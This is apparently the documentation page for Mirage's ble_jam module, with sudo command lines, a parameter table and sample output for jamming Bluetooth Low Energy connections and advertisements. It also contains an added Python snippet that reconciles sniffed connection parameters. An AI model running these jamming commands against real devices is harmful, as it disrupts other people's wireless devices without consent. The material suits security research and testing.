ble_jam

Presentation

ble_jam exposes the jamming features implemented in BTLEJack or Ubertooth: it can jam a new connection (“newConnections” as JAMMING_MODE) or an existing connection (“existingConnections” as JAMMING_MODE). You can provide additional parameters to target a specific device: TARGET (if the mode is “newConnections”) or ACCESS_ADDRESS, CRC_INIT and CHANNEL_MAP (if the mode is “existingConnections”). If the custom version of the BTLEJack firmware is in use, additional jamming features are available to reactively jam specific advertisements. You can select a target with the TARGET input parameter: the advertisements emitted by this target are reactively jammed on the channel given by the CHANNEL input parameter, which corrupts the transmitted frames. You can also choose a custom jamming pattern by providing the PATTERN input parameter and its position in the Link Layer packet (OFFSET). This module needs ble_sniff. If multiple interfaces are provided, the sniffers are distributed across the three advertising channels.

Warning

This attack is sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.

Compatible devices

Input parameters

Name            Default value   Possible values                                    Description
--------------  --------------  -------------------------------------------------  -------------------------------------------------------------------
INTERFACE       microbit0       microbitX,ubertoothX                               Primary interface to use
INTERFACEA                      microbitX,ubertoothX                               Optional additional interface
INTERFACEB                      microbitX                                          Optional additional interface
TARGET                          <BD address>                                       Target address
CHANNEL         37              37|38|39                                           Communication channel to jam
JAMMING_MODE    advertisements  newConnections|existingConnections|advertisements  Jamming strategy
ACCESS_ADDRESS                  0xYYYY                                             Access address for an existing connection
CRC_INIT                        0xYYYYYY                                           CRCInit for an existing connection
CHANNEL_MAP                     0xYYYYYYYYYY                                       Channel Map for an existing connection
PATTERN                         <hexadecimal>                                      Pattern included in the Link Layer advertisements to reactively jam
OFFSET                          <integer>                                          Position of pattern in the Link Layer advertisements

Output parameters

This module doesn’t provide any output parameters.

Usage

Jamming a new connection

To jam a new connection, provide “newConnections” as the value of the input parameter JAMMING_MODE, and optionally a target:

$ sudo mirage ble_jam JAMMING_MODE=newConnections
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0xcd5cdb3f     │ 0x9b03c3 │ 0x1e007fffff │ 36           │ 9             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[PACKET] [ CH:37|CLK:1559493296.836213|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=7F:C2:DC:21:C2:B7 | dstAddr=FF:FF:60:A5:17:44 | accessAddress=0x3fdb5ccd| crcInit=0xc3039b| channelMap=0x1e007fffff| hopInterval=36| hopIncrement=9 >>
[INFO] Recovering Hop Interval ...
[...]

Then, the module tries to jam the corresponding connection.
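
In the session above, the “Sniffed Connection” table and the CONNECT_REQ log line print the access address and CRCInit in opposite byte order. The following added example (not part of Mirage or of the original page) parses both lines as copied from that output and checks that they describe the same connection; the function names are hypothetical, and the channel map decoding assumes that bit i of the printed integer stands for data channel i.

```python
import re

# Copied from the session above: the table row and the CONNECT_REQ log line.
TABLE_ROW = "│ 0xcd5cdb3f     │ 0x9b03c3 │ 0x1e007fffff │ 36           │ 9             │"
PACKET_LINE = ("[PACKET] [ CH:37|CLK:1559493296.836213|RSSI:0dBm ] << BLE - Advertisement Packet "
               "| type=CONNECT_REQ | srcAddr=7F:C2:DC:21:C2:B7 | dstAddr=FF:FF:60:A5:17:44 "
               "| accessAddress=0x3fdb5ccd| crcInit=0xc3039b| channelMap=0x1e007fffff"
               "| hopInterval=36| hopIncrement=9 >>")

def parse_packet_fields(line):
    """Return the key=value fields of a [PACKET] line as a dict of strings."""
    return dict(re.findall(r"(\w+)=([^|\s>]+)", line))

def parse_table_row(row):
    """Split a box-drawing table row into its stripped cell values."""
    return [cell.strip() for cell in row.strip("│").split("│")]

def swap_bytes(hex_value):
    """Reverse the byte order of a '0x...' string, keeping its width."""
    raw = bytes.fromhex(hex_value[2:])
    return "0x" + raw[::-1].hex()

def used_data_channels(channel_map_hex):
    """List the data channels (0-36) whose bit is set.
    Assumption: bit i of the printed integer stands for data channel i."""
    value = int(channel_map_hex, 16)
    return [ch for ch in range(37) if (value >> ch) & 1]

def reconcile(row, line):
    """Check that the table row and the packet line describe the same connection."""
    aa, crc, chm, interval, increment = parse_table_row(row)
    fields = parse_packet_fields(line)
    return (swap_bytes(fields["accessAddress"]) == aa
            and swap_bytes(fields["crcInit"]) == crc
            and fields["channelMap"] == chm
            and fields["hopInterval"] == interval
            and fields["hopIncrement"] == increment)

if __name__ == "__main__":
    print("same connection:", reconcile(TABLE_ROW, PACKET_LINE))
    print("data channels in use:", used_data_channels("0x1e007fffff"))
```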

Jamming an existing connection

Similarly, to jam an existing connection, set “existingConnections” as the value of the input parameter JAMMING_MODE:

$ sudo mirage ble_jam JAMMING_MODE=existingConnections

Then, the execution is quite similar to the previously described one.

Jamming the advertisements transmitted by a specific device

If you want to jam the advertisements transmitted by a specific device, you need to have a custom version of BTLEJack installed on your Micro:Bit(s). Then you can use the “advertisements” mode as JAMMING_MODE and provide the BD address to jam (using the TARGET input parameter):

$ sudo mirage ble_jam JAMMING_MODE=advertisements TARGET=FF:FF:60:A5:17:44
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
^C[INFO] Mirage process terminated !

Jamming the advertisements containing a specific pattern

If you want to jam the advertisements containing a specific pattern, you need to have a custom version of BTLEJack installed on your Micro:Bit(s). Then you can use the “advertisements” mode as JAMMING_MODE and provide the pattern to jam (using the PATTERN and OFFSET input parameters):

$ sudo mirage ble_jam JAMMING_MODE=advertisements PATTERN=112233445566 OFFSET=8
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
^C[INFO] Mirage process terminated !